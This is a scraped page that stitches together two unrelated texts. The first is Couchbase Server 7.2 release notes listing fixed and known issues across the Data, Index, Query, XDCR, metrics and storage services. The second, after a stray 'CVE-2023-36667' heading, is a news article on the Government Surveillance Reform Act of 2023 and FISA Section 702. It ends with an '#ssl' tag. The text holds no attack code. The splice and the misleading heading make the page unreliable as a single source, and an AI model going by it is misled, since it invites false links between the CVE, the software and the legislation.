When using .NET SDK on Windows 10 client and client certs were enabled on CB Server, the Data-Service did not establish a connection and client bootstrap failed with a OpenSSL “session id context uninitialized" error.

Data-Service has been updated to disable TLS session resume.

MB-57064

GET\_META requests for deleted items fetched metadata in memory which was not evicted in value-eviction buckets.

Metadata items are now cleaned when the expiry pager runs.

MB-57106

DCP clients streamed in out-of-sequence-order \[OSO\] backfill snapshots under Magma observed duplicate documents received in the disk snapshot. This happened where the stream was paused and resumed when the resume point was wrongly set to a key already processed in the stream.

OSO backfill in Magma now sets the correct resume point after a pause.

MB-57304

Data Service rebalance duration was significantly impacted if other DCP clients created a large number of Streams, if those streams needed to be read from disk, due to the lack of prioritizing between rebalance and other DCP clients.

The number of backfills each DCP client can perform concurrently has been limited to allow fairer allocation of resources.

MB-57400

The computation count for the items remaining DCP/Checkpoint stats exposed to Prometheus was the O(N) function. Where N is the number of items in a checkpoint. This caused various performance issues including Prometheus stats timeouts when checkpoints accumulated a high number of items.

The computation count has been optimized and now is O(1).

MB-57609

A spurious auto-failover could happen when Magma compaction visited a TTL’d document that was already deleted.

Document not found does not now increment the number of read failures.

**Index Service**

  

Issue

Description

Resolution

MB-56339

During scaling, an GSI indexer rebalance froze and did not successfully complete. This was because an index snapshot was not correctly deleted and recreated.

A flag now handles snapshots to ensure they are correctly deleted or recreated when indexes are updated during rebalancing.

MB-57021

When alter index updated the replica count, new replicas were not built immediately when the original definition was {defer\_build: true}. Existing replicas were built and new replicas were built in the next processing iteration.

New replicas are now built when the replica count is updated for deferred indexes. The status of existing index instances is checked, and if ready, a new build of the instance is triggered.

MB-57777

When the indexer was unable to keep up with KV mutations, and there was a queue of mutations within the indexer, there was a large memory overhead from the bookkeeping of queued up mutations.

Indexer has been improved to optimize memory usage so that the bookkeeping overhead is reduced for queued up mutations.

**Query Service**

  

Issue

Description

Resolution

MB-56533

Due to how nested dependencies were handled, a sudden rise in memory utilization of the query service on a node caused a memory alert issue. The node did not recover correctly following a restart.

Nested dependencies are now handled appropriately in the ADVISE statement.

MB-56563

A query with multiple filters on an index key, one of which was a parameter, could produce incorrect results. This was caused by incorrectly composing the exact index spans to support the query.

The way in which exact spans are set has been modified to correct this issue.

MB-56579

Covering FLATTEN\_KEYS() on an array index generated incorrect results. This was because a modified version of the ANY clause was applied after the index which meant false positives were retained and Distinct scan rows were eliminated.

The ANY filter is now applied on an index scan itself when covering an index scan with flatten keys.

MB-56683

Inter-service read timeout errors were not detected or handled accordingly. User requests consequently failed with timeout errors without retrying with a new connection.

The error handling and retry mechanism has been modified to handle these types of timeout issues and errors.

MB-56727

Under certain circumstances, a query with UNNEST used a covering index scan and incorrect results were returned. Reference to the UNNEST expression should have prevented the covering index from being used for the query as the index did not contain the entire array.

The logic to determine covering UNNEST scans has been changed to not use a covering index scan for such queries.

MB-56937

When an index scan had multiple spans, index selectivity was incorrectly calculated.

Index selectivity for multiple index spans is now correctly calculated.

MB-57024

Incorrect results were returned for a non-IndexScan on a constant false condition. This was due to incorrect handling of a FALSE WHERE clause.

The FALSE WHERE clause is now correctly handled.

MB-57029

Querying system:functions\_cache in a multi query node cluster returned incomplete results with warnings. The query result included entries in the local query node, but none from remote query nodes. This was due to a typographical error.

The typographical error has been corrected.

MB-57080

A panic in go\_json.stateInString under parsed value functions caused by incorrect concurrent access resulted in the state being freed whilst still in use.

The concurrent access issue has been resolved.

MB-57251

A Prepared statement might have resulted in an incorrect result in a multi-node environment. For example, a database with two query nodes.

Correlated subqueries from an encoded plan are now detected and marked. This ensures correct results are provided.

MB-57279

When a WITH clause (common table expression, or CTE) was used inside a subquery, and the WITH clause definition referenced the parent query, and was correlated, the query engine did not properly detect the correlation. This produced an incorrect result from the WITH clause evaluation because the result was not cached correctly.

Correlations inside WITH clause definitions are now properly detected.

MB-57316

cbq required a client authentication key file whenever a certificate authority file was used.

cbq now accepts a certificate authority file without a client key file enabling use with username and password credentials.

MB-57680

When appropriate optimizer statistics were used in Cost-Based Optimizer (CBO), for a query with ORDER BY, if there were multiple indexes available for the query, CBO unconditionally favored an index that provided ordering. Such indexes were not always the best ones to use.

CBO now allows cost-based comparison of indexes.

MB-57838

An ADVISE statement with multiple levels of UNNEST caused a syntax error in the CREATE INDEX statement from the Index Advisor.

ADVISE has been improved when there are queries with multiple levels of UNNEST.

**Cluster Manager**

  

Issue

Description

Resolution

MB-57484

A Cluster Manager process crash meant the Delete Bucket memcached command was not always called before bucket files were deleted later in rebalance. This caused the memcached process to crash repeatedly causing data service downtime.

The Delete Bucket command is now called on memcached before a file is deleted during rebalance. This ensures mencached doesn’t attempt to read the files.

**Cross Datacenter Replication (XDCR)**

  

Issue

Description

Resolution

MB-56601

Data streamed from the Data Service over XDCR should always be streamed in order by mutation id. However, in some scenarios, for efficiency, the Data Service streamed records that were not ordered by mutation id. In certain situations, this out-of-sequence-order \[OSO\] caused performance issues.

OSO mode is now available as a global override to be switched off for any currently deployed replications to avoid performance issues.

MB-56711

XDCR did not process documents with a JSON array and Extended Attributes (XATTRs). When a document contained XATTRs, XDCR checked for XATTRs in transactions, transaction filters were enabled, and XATTRs were not checked.

When documents contain arrays, XATTRs are now checked in the transaction XATTRs, and the document is not prevented from being parsed in an array.

MB-56741

Binary documents were replicated when an Advanced Filtering Expression was present.

A filter has been added which can be turned on to prevent all binary documents from being replicated.

MB-56773

It appeared that XDCR had stalled and an explanation was not provided. For rebalances on the source or target, the XDCR pipeline should be restarted, and data movement should continue. Before the pipeline was restated, there might have been fewer data movements as the rebalanced VBs were no longer streaming.

An ETA is now provided in the Server UI to show when the pipeline is due to be restarted.

MB-56799

Checkpoint Manager created checkpoint records out-of-sequence when many target nodes ran slowly.

Checkpoint Manager now creates checkpoints in sequence when target nodes are slow.

MB-56848

The bucket topology service sent a concurrent map iteration and map write panic to XDCR which caused a fatal error.

Validation has been improved to prevent the panic from happening.

MB-56938

Prometheus stats did not include a pipeline’s status.

The pipeline status is now provided as part of a prometheus stat.

MB-57130

A Checkpoint Manager Initialization error caused two memory leak types. These were a backfill pipeline and a main pipeline memory leak.

The Pipeline Manager and backfill pipeline have both been modified to prevent the memory leaks.

MB-57183

XDCR Checkpoint Manager instances were not cleaned up under certain circumstances due to timing and networking issues when contacting target, or when an invalid backfill task was fed in as input.

Checkpoint Manager instances are now cleaned up. A flag has been added to check for invalid backfill tasks.

MB-57234

When a replication spec change was made to a non-Data Service node, delete replication hung and caused the node to return an incorrect replication configuration.

XDCR now checks that the node is running the Data Service and handles it correctly.

MB-57277

XDCR could fail due to multiple connection issues. For example, DNS issues or firewalls. For a number of databases, it was a difficult task to manually check every node to determine where the connection issue was. For multiple nodes in a database and in the target database, debugging the issue required many connection checks.

A connection pre-check feature has been added to XDCR which ensures all connections from source nodes to target nodes are valid. Credentials are now also checked.

MB-57412

Running ipv6 only mode + non-encrypted remote resulted in invalid IP addresses being returned, leading to connection issues.

A valid IP address is now returned.

MB-57462

StatsMgr stopping could hang due to watching for notifications resulting in stranded go-routines.

Go-routines are now stopped correctly.

MB-57562

When ipv4 only mode was used, and full encryption only had an alternate address configured where the internal address was unresolvable, XDCR resulted in an error when it contacted the target data nodes.

The specific scenario has been fixed so that replication can now proceed.

MB-57743

The Prometheus endpoint did not expose any XDCR error metrics.

XDCR error metrics are now exposed via Prometheus.

MB-57787

A legacy race condition where metadata store could cause a conflict was exposed as part of the binary filter improvements.

Legacy race conditions have all been resolved.

MB-58203

Under certain circumstances, when rebalancing, the target cluster could return an EACCESS error code that caused source XDCR to pause the pipeline.

This has been reversed. Instead of pausing the pipeline when rebalancing, XDCR now retries when an EACCESS error is encountered in XmemNozzle. XDCR counts and prints this activity in the log.

MB-58545

Checkpoint Manager could be stuck when stopping if it had not been started yet, resulting in memory leak.

Checkpoint Manager can now be stopped correctly even when it hasn’t been started.

**Metrics and Monitoring**

  

Issue

Description

Resolution

MB-56464

An issue occurred where the Cluster Manager instructed Prometheus to reload the configuration and the reload timeout impacted other requests.

The Cluster Manager has been improved to handle timeouts when instructing Prometheus to reload the configuration.

MB-56517

The Cluster Manager’s computed utilization stats were inaccurate due to time interval discrepancies in components where data was collected.

The Cluster Manager now reports raw stats as Prometheus counters.

**Storage**

  

Issue

Description

Resolution

MB-57157

Inconsistencies were observed where a single Magma bucket in a database took a long time to warm up.

The seq index scan has been optimized for tombstones of zero value size. Optimization is for look up by key, sequence iteration, and key iteration. Docs of 0 value size are placed in both key index and seq index.

MB-57714

Disk backfills were hanging permanently due to high memory consumption when large documents were streamed over many DCP streams concurrently.

Memory for a document read by a DCP stream is now released before switching to another stream.

**Known Issues**

**Search Service**

  

Issue

Description

Workaround

MB-58450

An issue occurs with node failover. If a user does not bring in a replacement node before the failover occurs, then lost active or lost replica search indexes that have partitions on the replaced node are not rebuilt.  
As a result, search requests return partial/incomplete results. In addition,existing indexes with defined replica(s) become vulnerable to another node failure.

This issue is only pertinent to the **7.2.1** release, and does not affect older builds.

This situation can be prevented if a replacement node was brought into the cluster in place of the failed over node, before starting the rebalance operation. This problem should not affect on-line or off-line rebalances.

If lost indexes are encountered, then, a manual update to the affected search index definition(s) will trigger a rebuild of the affected indexes.  
(The advice here is to toggle the replica count so that unaffected index partitions are re-used, and only the lost partitions are rebuilt.)

CVE-2023-36667: Release Notes for Couchbase Server 7.2

The Government Surveillance Reform Act of 2023 pulls from past privacy bills to overhaul how police and the feds access Americans’ data and communications.

In 1763, the radical journalist and colonial sympathizer John Wilkes published issue no. 45 of _North Briton_, a periodical of anonymous essays known for its virulent anti-Scottish drivel—and for viciously satirizing a British prime minister until he quit his job. The fallout from the subsequent plan of the British king, George III, to see Wilkes put in irons for the crime of being too good at lambasting his own government reverberates today, particularly in the nation whose founders once held Wilkes up as an idol, plotting a revolt of their own.

Wilkes’ arrest boiled the Americans’ blood. Reportedly, the politician-cum-fugitive had invited the king’s men into his home to read the warrant for his arrest aloud. He quickly tossed it aside. At trial, Wilkes explained its most insidious feature: “It named nobody,” he said, “in violation of the laws of my country.” This so-called general warrant, which subsequent lawsuits by Wilkes would see permanently banned, vaguely described some criminal allegations, but not a single place to be searched nor suspect to be arrested was named. This ambiguity granted the king's men near blanket authority to arrest anyone they wanted, raid their homes, and ransack and destroy their possessions and heirlooms, confiscating large bundles of private letters and correspondence. When the Americans later passed an amendment to ban vague legal warrants describing neither "the place to be searched" nor "persons or things to be seized," it was Wilkes's home, historians say, that they pictured.

This morning, a group of United States lawmakers introduced bicameral legislation aimed, once again, at reining in a government accused of arbitrarily snatching up the private messages of its own citizens—not by breaking down doors and seizing handwritten notes, but by tapping into the power of internet directly to collect an endless ocean of emails, calls, and texts. The Government Surveillance Reform Act of 2023 (GSRA)—introduced in the US House by representatives Zoe Lofgren and Warren Davidson, and in the US Senate by Ron Wyden and Mike Lee—is a Frankenstein bill more than 200 pages long, combining the choicest parts of a stack of cannibalized privacy bills that rarely made it past committee. The patchwork effect helps form a comprehensive package, targeting various surveillance loopholes and tricks at all levels of government—from executive orders signed by the president, to contracts secured between obscure security firms and single-deputy police departments in rural areas.

“Americans know that it is possible to confront our country’s adversaries ferociously without throwing our constitutional rights in the trash can,” Wyden tells WIRED, adding that for too long surveillance laws have failed to keep up with the growing threats to people’s rights. The GSRA, he says, would not strip US intelligence agencies of their broad mandate to monitor threats at home or abroad, but rather restore warrant protections long recognized as core to democracy’s functioning.

The GSRA is a Christmas list for privacy hawks and a nightmare for authorities who rely on secrecy and circumventing judicial review to gather data on Americans without their knowledge or consent. A US Justice Department requirement that federal agents obtain warrants before deploying cell-site simulators would be codified into law and extended to cover state and local authorities. Police in the US would need warrants to access data stored on people’s vehicles, certain categories of which should already require one when the information is stored on a phone. The government could also no longer buy sensitive information about people that would require a judge’s consent, had they asked for it instead.

What’s more, the bill will end a grandfather clause that’s keeping alive expired portions of the USA Patriot Act that’s allowed the FBI to continue employing surveillance techniques that have technically been illegal for two years. Petitioners in federal court seeking relief due to privacy violations will also no longer be shown the door for having no more than a “reasonable basis” to believe they’ve been wrongfully searched or surveilled.

Not to be outstripped by the sheer variety of smaller pet reforms—such as yanking the security clearances of anyone caught abusing a classified database (a crime that’s commonly punished with a slap on the wrist), or ensuring that the government can’t simply store people’s data for the rest of their lives because it hasn’t been decrypted—the GSRA principally takes aim at Section 702 of the Foreign Intelligence Surveillance Act, the government’s most promiscuous surveillance program through which it captures a large but _indeterminate_ amount of messages en route to and from Americans’ phones each day.

After 9/11, the US government commenced with some of the most extensive domestic surveillance in modern history, a monument achieved on the back of the internet’s technological revolution that redefined what it meant for people to communicate. Exposed by journalists and leakers at the height of America’s recent wars in the Middle East, the extent of the surveillance, once publicly acknowledged, unleashed bad memories of corrupt intelligence agencies relentlessly bugging anyone with a phone—actors, comedians, civil rights leaders, and even one another.

The US Congress, fearful of foreign threats, enacted only piecemeal reforms in response to these revelations, which kicked off in the early aughts and crescendoed in 2013 with Edward Snowden’s polemic leaks. The government’s sporadic but incessant updating of agency rules and procedures have done little to stymie routine abuses of the 702 data—which is currently fathomless. The first thing to know about the program, and how many Americans it ensnares each year, is that the government doesn't know the number and has little interest in learning it. A key defense, in fact, of the government's lack of transparency in this area is that examining the data to determine who is and is not an American would technically commit the very violation its procedures are designed to prevent.

While the program is strictly authorized for the surveillance of foreigners on foreign soil, wiretapping internet communications is neither accurate nor precise. In 2008, Congress was forced to effectively recognize that the collateral surveillance of Americans was the inevitable byproduct of operating an intelligence program with Big Brother–like proportions. Faced with growing privacy fears at home and emerging national security threats abroad, Congress took stock of the situation and then resigned to split the baby.

Nearly 60 years ago, in the face of overwhelming evidence that police interrogations are inherently coercive, the US Supreme Court did not ban the practice in _Miranda v. Arizona_ but rather ruled that the threat to people's rights could be reasonably mitigated by cops reading “collared” suspects a brief statement of rights—a “warning” that has much the same purpose as legal disclaimers read aloud on customer care calls. Similarly, Congress chose not to put an end to the surveillance of Americans' communication despite the enormous scale of rights violations accumulating steadily each day. Instead, it ordered the creation of many byzantine rules and procedures designed to ameliorate constitutional risks to some reasonable degree—by merely lessening the odds of a federal employee laying eyes on any illicitly gained information.

“Incidental” is a surveillance term of art referring to communications of Americans not _accidentally_ intercepted by their own government, but _unavoidably_. In a report last month, a federal privacy watchdog stressed that while the word “incidental” made the collection sound small, “it should not be understood as occurring infrequently.”

The GSRA takes aim at the use of incidental data by federal law enforcement agents, who are not bound by the same rules against spying on Americans as are analysts at the Pentagon, whose purview lies strictly overseas. While it is illegal to target US persons under 702, once they have been surveilled, the communications become accessible nevertheless to the Federal Bureau of Investigation, which has its own procedures for “querying” the nebulous database—rules that can permit, for example, the reading of emails marked “attorney-client privilege” so long as the subject isn’t wanted for a crime.

An inspector general’s investigation last year found the FBI’s own legal experts at variance over “key legal principles” tied to rules governing 702's use. Findings like these have served only to repeatedly injure the FBI, nurturing a cycle of disappointment and distrust in its capacity to behave as a competent surveillant.

The GSRA could work positively to solve many problems at the FBI. Trust in the bureau among lawmakers is only likely to grow, once its unfettered access to a digital black box filled with everyone's secrets becomes subject to court review. The GSRA removes the ability entirely for the FBI to run queries on US persons without probable cause, that is, “a reasonable amount of suspicion, supported by circumstances sufficiently strong to justify a proven and cautious person's belief that certain facts are probably true.” (In contrast, the current standard is this: Be looking for evidence of a crime, don't go fishing, and be “reasonably” confident the information you're after is “likely” to be found.)

“For too long, intelligence and law enforcement agencies have had unchecked access to Americans’ personal data,” says Lofgren, the representative from California who issued a warning to colleagues on Tuesday against the “unwise” move of reauthorizing the 702 program without “carefully considering and enacting surveillance reforms.”

The GSRA is currently the only bill in Congress that could reauthorize the 702 statute that’s set to expire by the end of the year. The statute is what allows the government to apply for “certifications” issued by the secret Foreign Intelligence Surveillance Court (FISC). These certifications, which all last for one year, allow the government to compel the cooperation of communications services providers for three purposes: foreign intelligence, counterterrorism, and the tracking of nuclear proliferation—with an array of threats, from cybercrime to narco-trafficking, all couched within those categories.

Whether or not Congress reauthorizes 702 before it expires, the collection will continue unabated until at least April, when the certifications expire. Hypothetically, the government could reapply for new certifications, which the FISC could grant before April, thereby extending the program's life into 2025 without Congress lifting a finger. That is unlikely, however, says Bob Goodlatte, former chairman of the House Judiciary Committee, who says any attempt to wrest control away from Congress will be viewed as a “hostile gesture,” further imperiling Section 702's survivability.

“The FISA Court and the Director of National Intelligence have confirmed that our government conducted warrantless surveillance of millions of Americans’ private communications,” says Senator Mike Lee.

In remarks to WIRED, Lee pointed to high-level confirmations that the US government is conducting “warrantless surveillance of millions of Americans” each day. “It is imperative that Congress enact real reforms to protect our civil liberties,” he says, including “statutory penalties for privacy violations,” a precondition of his support for “reauthorizing Section 702.”

Tag

#ssl